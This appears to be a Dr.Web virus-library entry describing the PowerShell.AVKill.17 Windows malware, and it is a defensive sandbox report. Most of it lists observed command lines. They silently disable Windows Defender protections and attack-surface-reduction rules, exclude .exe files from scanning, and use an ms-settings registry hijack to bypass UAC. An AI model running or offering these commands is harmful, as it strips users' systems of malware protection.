ПОЛЬЗОВАТЕЛЯМ

Закрыть

Поиск

Поиск

Поддержка
Круглосуточная поддержка

Напишите

Запрос через форму

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Напишите

Задать вопрос в поддержку

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

RU
RU CN DE EN ES FR IT JP KZ UZ PL BY
Закрыть

Переключение языка сайта

Сервисы
Сканеры
FixIt!
Dr.Web vxCube
Экспертиза ВКИ
Вирусная библиотека
База знаний

Технологии

Термины

Обучение и просвещение

Мифы

Новости

PowerShell.AVKill.17

Добавлен в вирусную базу Dr.Web: 2024-01-31

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
  • [HKCU\SOFTWARE\Classes\ms-settings\shell\open\command] '' = '<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DW...
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableIOAVProtection 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableRealtimeMonitoring 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableScriptScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -MAPSReporting 0 " -WindowStyle Hidden -Verb RunAs'
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIOAVProtection 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRealtimeMonitoring 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScriptScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -MAPSReporting 0 -WindowStyle Hidden -Verb RunAs
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2
Запускает большое число процессов
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\it.bat
Другое
Создает и запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\it.bat" "' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupQuickScan 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanAvgCPULoadFactor 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' windowstyle hidden Set-MpPreference -ScanScheduleDay 8' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ExclusionExtension exe' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRemovableDriveScanning 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisablePrivacyMode 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SignatureScheduleDay 8' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBlockAtFirstSeen 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableLowCpuPriority 0' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableControlledFolderAccess Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableNetworkProtection Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ModerateThreatDefaultAction Ignore' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UnknownThreatDefaultAction Allow' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupFullScan 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanOnlyIfIdleEnabled 0' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SubmitSamplesConsent 2' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -HighThreatDefaultAction Ignore' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningNetworkFiles 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScriptScanning 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UILockdown 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableEmailScanning 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRealtimeMonitoring 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 5beb7efe-fd9a-4556-801d-275e5ffc04cc -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CheckForSignaturesBeforeself.box_boxningScan 0' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ControlledFolderAccessProtectedFolders []' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids c1db55ab-c21a-4637-bb3f-a12568109d35 -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableFileHashComputation 0' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CloudBlockLevel 0' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableAutoExclusions 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -AttackSurfaceReductionRules_Actions Disabled' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableIOAVProtection 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableArchiveScanning 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBehaviorMonitoring 1' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanParameters 1' (со скрытым окном)
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\it.bat" "
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableFileHashComputation 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids c1db55ab-c21a-4637-bb3f-a12568109d35 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ControlledFolderAccessProtectedFolders []
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CheckForSignaturesBeforeself.box_boxningScan 0
  • '<SYSTEM32>\timeout.exe' /t 120 /nobreak
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuratio...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -UILockdown 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SignatureScheduleDay 8 '-WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -UnknownThreatDefaultAction Allow' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine 1 " -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -SevereThreatDefaultAction Ignore " -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList 'windowstyle hidden Set-MpPreference -ScanScheduleDay 8' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ScanParameters 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ScanAvgCPULoadFactor 1' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ScanOnlyIfIdleEnabled 0' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ModerateThreatDefaultAction Ignore '-WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -LowThreatDefaultAction Ignore" -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -HighThreatDefaultAction Ignore ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -CloudBlockLevel 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableAutoExclusions 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableArchiveScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningNetworkFiles 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -HighThreatDefaultAction Ignore
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanOnlyIfIdleEnabled 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupFullScan 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UnknownThreatDefaultAction Allow
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ModerateThreatDefaultAction Ignore
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableNetworkProtection Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableControlledFolderAccess Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBlockAtFirstSeen 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -EnableLowCpuPriority 0
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -SignatureScheduleDay 8
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisablePrivacyMode 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableRemovableDriveScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ExclusionExtension exe
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' windowstyle hidden Set-MpPreference -ScanScheduleDay 8
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanAvgCPULoadFactor 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableCatchupQuickScan 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableEmailScanning 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -DisableBehaviorMonitoring 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -UILockdown 1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableNetworkProtection Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ExclusionExtension exe ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableFileHashComputation 0 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 5beb7efe-fd9a-4556-801d-275e5ffc04cc -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\timeout.exe' /t 15 /nobreak
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 5beb7efe-fd9a-4556-801d-275e5ffc04cc -AttackSurfaceReductionRule...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRule...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 -AttackSurfaceReductionRule...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Actions Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c ' -WindowStyle Hidden -Verb ...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Actions Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5' -WindowStyle Hidden -Verb R...
  • '<SYSTEM32>\timeout.exe' /t 5 /nobreak
  • '<SYSTEM32>\reg.exe' ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
  • '<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdm...
  • '<SYSTEM32>\timeout.exe' /t 20 /nobreak
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 3b576869-a4ec-4529-8536-b80a7769e899 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49e8-8b27-eb1d0a1ce869 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableControlledFolderAccess Disabled ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableScanningNetworkFiles 1' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableRemovableDriveScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisablePrivacyMode 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableEmailScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableCatchupFullScan 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableCatchupQuickScan 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableBlockAtFirstSeen 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableBehaviorMonitoring 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableAutoExclusions 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -DisableArchiveScanning 1 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -ControlledFolderAccessProtectedFolders [] ' -WindowStyle Hidden -Verb RunAs"
